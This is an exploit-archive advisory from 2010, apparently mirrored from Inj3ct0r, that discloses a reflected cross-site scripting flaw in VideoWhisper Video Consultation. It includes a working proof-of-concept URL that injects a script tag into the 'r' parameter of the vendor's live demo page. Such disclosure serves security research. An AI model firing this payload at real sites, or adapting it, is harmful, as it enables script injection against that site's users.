Home / os / win7

VideoWhisper Video Consultation Xss Vulnerabilities

Posted on 27 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>VideoWhisper Video Consultation Xss Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================
VideoWhisper Video Consultation Xss Vulnerabilities 
===================================================


To accomplish great things, we must dream as well as act
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=

AUTHOR          : Cur53D
MAIL            : Hyq6xx@gmail.com
DATE            : 27,june 2010
Blog            : www.Cur53D.dlstreet.net
Type            : XSS
Greetz          : Sid3^effects,*L0rd CrusAd3r*,D34D F0X TH3 BL4CKH4T And All My Friends


####################################################################################
About The Script:

VideoWhisper Video Consultation is a premium high definition video communication

software designed for online video consultations, interactive live presentations,

trainings, webinars, coaching? and online collaboration.

It was designed for few to many 2 way moderated video communication. Moderators

control what participant is displayed on main screen (speaker) and can also add an

additional participant (inquirer) to ask questions or assist. Participants can

change their public status (i.e. request to speak), upload and download room files,

text and video chat.

########################################################
This vulnerability affects /consultation/index.php

LIVE DEMO :
####################################################################################

http://www.videowhisper.com/demos/consultation/index.php?r=%3E%22%3E%3CScRiPt%20%

0A%0D%3Ealert%28404944702436%29%3B%3C/ScRiPt%3E.

####################################################################################
#Cur53D


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :